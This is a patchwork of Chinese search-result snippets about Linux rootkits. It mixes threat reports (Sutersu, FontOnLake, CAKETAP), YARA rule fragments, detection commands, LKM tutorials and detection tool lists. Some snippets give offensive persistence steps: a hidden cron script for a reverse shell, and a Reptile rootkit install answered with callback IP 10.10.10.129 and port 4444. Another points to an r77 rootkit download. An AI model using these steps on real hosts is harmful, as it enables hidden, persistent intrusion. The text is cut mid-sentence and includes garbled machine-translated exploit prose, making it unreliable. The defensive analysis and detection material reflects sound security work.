Lacework Labs 最近发现了一个新的在野 Rootkit。除了释放的内核模块和用户态样本文件外,还针对 Dropper 进行了深入了解。...值得注意的是,ELF Dropper 和内核 Rootkit 在 VirusTotal 上的检出率很低。 通过 mktemp系统调用生成临时文件后,首先将 Rootkit 写入磁盘。...Rootkit Sutersu 其内核模块基于开源的 Rootkit Sutersu修改而来。该 Rootkit 支持内核版本广泛,支持架构多样(x86、x86_64 和 ARM)。...s_hook_local_ip” $s28 = “nf_hook_pre_routing” condition: uint32(0)==0x464c457f and 10 of them } rule linux_mal_suterusu_rootkit...condition: uint32(0)==0x464c457f and all of them } 参考来源: https://www.lacework.com/blog/hcrootkit-sutersu-linux-rootkit-analysis
1、Lacework Labs在Avast公司的同事最近初步的鉴定基础之上,标识出与 HCRootkit / Sutersu Linux Rootkit活动相关的新样本和基础设施。...摘要 Lacework Labs 最近检测了一个新的公开共享的 rootkit,确定了它的核心功能和它对 Linux 主机的威胁级别。...该rootkit最早由Avast共享,引发我们确认该rootkit覆盖范围和进一步的研究。除了删除内核模块和userland样本外,我们以下的分析还提供了对安装程序(恶意病毒种植程序)的深入了解。...该rootkit 具有广泛的内核版本支持,并支持多种架构,包括x86、x86_64 和ARM。正如人们对 rootkit 所期望的那样,Sutersu 支持文件、端口和进程隐藏。...s_hook_local_ip" $s28 = "nf_hook_pre_routing" condition: uint32(0)==0x464c457f and 10 of them } rule linux_mal_suterusu_rootkit
internet Storm Center安全专家近日发表一篇报告,报告中称在linux系统中发现基于ssh服务的rootkit,使用RPM安装的系统会受到影响。...报告中指出目前rootkit支持三个命令:Xver、XCAT、Xbnd,第一个命令打印rootkit版本,xCAT打印数据在会话中,并传回给攻击者,Xbnd命令设置一个监听器。...该rootkit会替换服务器中的libkeyutils库,主要功能包括收集用户凭据,除账号密码之外,还可以收集RSA和DSA的私有密钥。 通过以下命令可以查看服务器是否中招。...rpm -qfV /lib*/libkeyutils* 由于攻击者可能将其存储在不同的目录,还可以使用find命令来查找所有可疑的文件 # find / -name libkeyutils*
和杀毒软件打架一样,Rootkit和反Rootkit也是互搏的对象。无论如何互搏,其战场均在内核态。 很显然,我们要做的就是: 第一时间封堵内核模块的加载。...我们知道,Linux内核的text段是在编译时静态确定的,加载时偶尔有重定向,但依然保持着紧凑的布局,所有的内核函数均在一个范围固定的紧凑内存空间内。...反之,如果我们调用Linux内核现成的接口注册一个回调函数来完成我们的任务,那么这就是一种正规的方式,本文中我将使用一种基于 内核通知链(notifier chain) 的正规技术,来封堵内核模块。...来吧,我们写一个简单的内核模块,看看效果: // testmod.c #include noinline int test_module_function...很容易,还记得在文章 “Linux动态为内核添加新的系统调用” 中的方法吗?我们封堵了前门的同时,以新增系统调用的方式留下后门,岂不是很正常的想法? 是的。经理也是这样想的。
免责声明:本文介绍的安全知识方法以及代码仅用于渗透测试及安全教学使用,禁止任何非法用途,后果自负 前言:作者最近在学习有关linux rootkit的原理与防范,在搜索资料中发现,在freebuf上,对...rootkit进行介绍的文章并不是很多。...在此我斗胆献丑,总结了下我最近的学习收获,打算发表一系列关于linux rootkit的文章在freebuf上,希望能够帮助到大家。...对于这个系列文章,我的规划如下:这一系列文章的重点集中在介绍linux rootkit中最讨论最多也是最受欢迎的一种:loadable kernel module rootkit(LKM rootkit...1.基本的LKM的编写 下面是一个最基本的LKM的实现,接下来我会对这个例子进行讲解 /*lkm.c*/ #include #include <linux/
近期,网络安全研究人员详细介绍了一项可能针对东南亚实体的新型攻击活动,该活动可能使用以前无法识别的Linux恶意软件,除了收集凭据和充当代理服务器外,还可以远程访问其运营商。...为了收集数据或进行其他恶意活动,这类恶意软件使用修改后的合法二进制文件,这些文件经过调整以加载更多组件。此外,为了隐藏自身的存在,FontOnLak总是伴随着一个 rootkit。...这些二进制文件通常在Linux系统上使用,并且还可以作为一种持久性机制。...FontOnLake的工具集包括三个组件,它们由合法 Linux 实用程序的木马化版本组成,用于加载内核模式的rootkits和用户模式的后门,所有这些都使用虚拟文件相互通信。...ESET表示发现了两个不同版本的Linux rootkit,它们基于一个名为Suterusu的开源项目,在功能上有重叠之处,除了能隐藏自身外,还包括隐藏进程、文件、网络连接,同时还能够执行文件操作,提取并执行用户模式的后门
& f0rb1dd3分享的Linux RootKit高级技术,加载执行Linux Rootkit木马,如下所示: 2.解密Linux RootKit木马数据过程,如下所示: 3.Linux RootKit...木马数据,如下所示: 4.笔者自己编写了一个简单的解密程序,用于解密上面的Linux RootKit木马数据,如下所示: 5.解密Linux RootKit木马数据之后,如下所示: 6.通过逆向分析解密出来的...Linux RootKit木马,发现是Reptile木马源代码修改的,如下所示: 7.Reptile是一款开源的Linux RootKit木马程序,Linux RootKit木马功能非常强大,如下所示...: 可以隐藏文件、目录、自身、网络连接、反弹shell木马等,Linux RootKit木马运行之后,如下所示: 该Linux RootKit木马可以通过Volatility内存检测的方法发现木马后门模块...,如下所示: 笔者曾研究过多个基于Linux平台的RootKit家族样本,说不定你的服务器上就被安装了这些RootKit家族样本,RootKit包含应用层和驱动层,应用层主要使用的技术就是二次打包修改
关于r77-Rootkit r77-Rootkit是一款功能强大的无文件Ring 3 Rootkit,并且带有完整的安全工具和持久化机制,可以实现进程、文件和网络连接等操作及任务的隐藏。...这个键的DACL被设置为可以给任意用户授予完整访问权。 “$77config”键在注册表编辑器被注入了Rootkit之后会自动隐藏。...“Uninstall.exe”程序负责将r77从系统中卸载掉,并解除Rootkit跟所有进程的绑定关系。...计划任务确实需要存储名为77svc64.job的文件,这是无文件概念的唯一例外。但是,一旦Rootkit运行,计划任务也会通过前缀隐藏。...测试环境 测试控制台可以用来向单独进程注入r77,或接触进程跟Rootkit的绑定关系: 工具下载 r77 Rootkit 1.2.0.zip:【点击阅读原文】(解压密码:bytecode77) 项目地址
在 Linux(和其他类 Unix 操作系统)中,系统内存分为两个不同的域:用户空间和内核空间。...可加载的内核模块 Linux 内核是操作系统的核心,它管理系统资源并为操作系统和应用程序的其他部分提供基本服务。...浏览 Linux syscalls 手册页,了解有关 syscalls 的更多信息。 ...创建一个名为 lkmdemo.c 的文件,并复制下面的模块代码(代码基于 Diamorphine rootkit):#include#include#include#include#include#include#include
Rootkit虽不是最常见的恶意软件类型,但根据过去发生的一些重大攻击事件表明,Rootkit一般都和木马、后门等其他恶意程序结合使用,起到拦截网络流量、监视用户、窃取登录凭据或劫持资源以执行DDoS攻击的作用...定制化的rootkit 该研究还发现,暗网论坛主要是用户级Rootkit的销售宣传地,这些用户级Rootkit通常用于大规模攻击。...在某些情况下,开发人员会根据买方的需要提供定制的Rootkit。67%的宣传广告显示Rootkit倾向为Windows“量身定制”。...△ 各操作系统的的 rootkit 的份额,Windows占比69% “尽管开发此类程序存在困难,但每年我们都会看到新版本的rootkit出现,其运行机制与已知恶意软件的运行机制不同。”...可见,Rootkit的主要威胁仍将是掩盖那些复杂的、有针对性的攻击。
两种分配的内存地址都是高度可预测的。...另一方面, 可执行模块的平均大小在 400Mb 方面是微不足道的 受控的内存分配,因此它不应该扭曲预期的内存 地图太多了。 2....但漏洞的性质仍然 允许少量且有限的信息泄漏,可用于 恢复内存值,需要继续正常执行( CoE) 的易受攻击的应用程序。...关于我们的精确图案,有几个关键点需要了解 填充。 1. 我们从喷雾中的每个 dword 必须包含 它自己的偏移量到页面的值。页面大小的图案就足够了 因为我们只想泄漏大约 2 个字节的堆栈地址。...,最终的概念验证代码产生了一个自我补丁 在 25% 的测试用例中,在 50% 的用例中使用后备控制,并且 25% 的情况下不可避免的崩溃。
权限维持-Linux-定时任务-Cron后门 利用系统的定时任务功能进行反弹Shell 1、编辑后门反弹 vim /etc/.backshell.sh #!.../etc/upload fi 权限维持-Linux-内核加载LKM-Rootkit后门 传统后门通过TCP连接,容易被发现 现在常用的linux维持权限的方法大多用crontab和开机自启动,...所以我们想有一个非tcp连接、流量不容易被怀疑的后门,并且在大量的shell的场景下,可以管shell,Reptile刚好是种LKM rootkit,因此具有很好的隐藏性和强大的功能。.../setup.sh install <<EOF reptile hax0r s3cr3t reptile 666 y 10.10.10.129 4444 1 EOF 注意Rootkit是安装在目标主机上的...的检测: linux平台下:chkrootkit、rkhunter、OSSEC、zeppoo等 Windows平台下:BlackLight、RootkitRevealer、Rootkit Hook Analyzer
通过 LD_PRELOAD 进行动态链接器劫持是一种 Linux rootkit 技术,由不同的攻击者在野外使用。在本系列的第一部分中,我们将讨论此威胁并说明如何检测它。...我们将介绍三种不同的 Linux rootkit 技术:动态链接库劫持(LD_PRELOAD)、Linux kernel module(LKM) rootkit 和 eBPF rootkit。...虽然有些人从头开始生成逻辑,但也有人使用公开可用的开源工具。以下是一些示例: Winnti for Linux – 这种来自中国的后门工具由用户模式 rootkit 和主后门组成。...取消隐藏使用不同的暴力破解技术来检测隐藏的进程。总结 动态链接器劫持方式是一种 Linux rootkit 技术,被不同的威胁参与者在野外使用。...请继续关注本系列的第 2 部分,我们将深入探讨 Linux 内核模块 (LKM) rootkit。
一、概述 简介 中文名叫”Rootkit猎手”, rkhunter是Linux系统平台下的一款开源入侵检测工具,具有非常全面的扫描范围,除了能够检测各种已知的rootkit特征码以外,还支持端口扫描、常用程序文件的变动情况检查...rootkit是Linux平台下最常见的一种木马后门工具,它主要通过替换系统文件来达到入侵和和隐蔽的目的,这种木马比普通木马后门更加危险和隐蔽,普通的检测工具和检查手段很难发现这种木马。...内核级rootkit: 是比文件级rootkit更高级的一种入侵方式,它可以使攻击者获得对系统底层的完全控制权,此时攻击者可以修改系统内核,进而截获运行程序向内核提交的命令,并将其重定向到入侵者所选择的程序并运行此程序...如果被 rootkit 之类的程序包攻击后 ( 也就是上一节的检测表中的第二部分所攻击时 ),那么最好最好直接重新安装系统, 不要存在说可以移除 rootkit 或者木马程序的幻想,因为,『隐藏』本来就是...rootkit 与木马程序的拿手好戏!
作者简介:许庆伟,Linux Kernel Security Researcher & Performance Develope 如今,云原生平台越来越多的使用了基于eBPF的安全探测技术。...Tracee是用于Linux的运行时安全和取证的开源项目,它基于eBPF实现,所以在安全监测方面效果更加优化。...在本文中,我们将探索控制eBPF事件的方法,并研究一个使用BPF事件捕获rootkit的案例。...eBPF: 不只是用来跟踪 eBPF是一种Linux内核技术,它允许在不更改内核源代码或添加新模块的前提下,在Linux内核中运行沙盒程序。...Diamorphine rootkit 现在,开始运行Tracee,来看看它将如何检测出Diamorphine rootkit。
,我发现它有点 在它变得高度的时代学习该主题具有挑战性 商业化,推动了详细的技术安全咨询 对公众的常规漏洞进行技术分析 使用权。...虽然这篇文章首先提出了一项有趣的研究, 它也考虑到了初学者:旨在 总结各种基础技能、技巧和思维 分析和控制现代和平凡的模式所需的模式,但 有点另类的二进制漏洞。...本文提供的代码完全不可靠,由 导致至少 25% 的漏洞的高熵性质 无法控制的崩溃的概率,以及通过表面编码 和测试选择。...--[ 2 - 漏洞 有问题的漏洞是一个关键的远程代码执行错误 Microsoft XML 核心服务,与 Windows 的每个版本相关 发现时存在的操作系统,根据 原始安全公告。...XEngine::执行+0x1b4 也就是说,崩溃内存地址的高位字等于 堆栈地址的低位字,位于本地的某处 XEngine::frame() 的变量框架。
据The Hacker News网站消息,威胁情报和事件响应公司 Mandiant发现,一个未知的黑客组织部署了以Oracle Solaris 系统为目标的新型Rootkit,其目的是破坏ATM网络,并使用虚假的银行卡在不同的银行进行未经授权的取款...攻击者曾长期通过利用名为 CAKETAP 的 Rootkit 隐藏网络连接、进程和文件。...研究人员从其中一台受害的 ATM 交换机服务器中恢复了内存取证数据,指出内核 Rootkit 的一种变体具有特殊功能,能够拦截卡和 PIN 验证,并使用被盗数据执从 ATM 终端取款。...此外,该Rootkit还使用两个称为 SLAPSTICK 和 TINYSHELL 的后门,它们都归因于 UNC1945,用于通过 rlogin、telnet 或 SSH 获得对关键任务系统的持久远程访问...,用于擦除与基于 Linux 和 Unix 的系统上的特定用户有关的日志条目; MIGLOGCLEANER – 一种ELF 实用程序,可在基于 Linux 和 Unix 的系统上擦除日志或从日志中删除某些字符串
欺骗任务管理器等行为工具,隐藏进程的另一种方法。原理是修改 EPROCESS 中的成员。如下分别提供驱动层伪装与应用层伪装的实现代码。...0x448 LARGE_INTEGER g_TarCreateTime = { 0 }; ULONG_PTR g_TarInheritedFromUniqueProcessId = 0; // 获取被伪装的进程的一些信息..., 实现进程伪装 // 参数1:DWORD dwProcessId 需要伪装的程序的PID // 参数2:wchar_t *lpwszPath 伪装之后程序的路径 //*****...NT_SUCCESS(status)) { MessageBox(_T("获取进程的基本信息失败!"))..., pbi.PebBaseAddress, &peb, sizeof(peb), NULL); // 获取指定进程环境块结构中的ProcessParameters, 注意指针指向的是指定进程空间
--[ 3 - 控制 在这一点上很明显,唯一合理的方法来控制 漏洞是膨胀堆栈,以便崩溃的指针会 落入可以控制的用户态内存区域: msxml6!...,并且访问冲突 仅仅是由于地址上没有繁忙的分配造成的。...,其次,将崩溃指针指向特定的 那个记忆的区域。...所以,让我们只是 把它当作巧妙处理任何事物的练习。 --[ 3.4 - 填充内存1:图像 因为必须控制的内存区域比较大,我的 最初的想法是利用一些预先计算好的大物体进行填充 它,例如图像。...源位图模式的变量越多,越大 生成的PNG图像;任何压缩的自然限制。 2.解压后的PNG在位图数据中有多余的字节,注入后 原始位图的每 3 个字节。
通过修改PEB进程环境块的方式实现隐藏DLL,此类隐藏属于断链隐藏。...InInitializationOrderModuleList; } PEB_LDR_DATA,*PPEB_LDR_DATA; InLoadOrderModuleList 成员保存了模块信息,而模块信息的结构为...根据DllBase判断 你的模块基址跟这个模块基址是否一样.如果一样那么我们就断开链表,从而实现 dll 的隐藏。...,ldm->BaseAddress); if (hMod == ldm->BaseAddress) //判断要隐藏的DLL...基址跟结构中的基址是否一样 { g_isHide = 1; //如果进入
领取专属 10元无门槛券
手把手带您无忧上云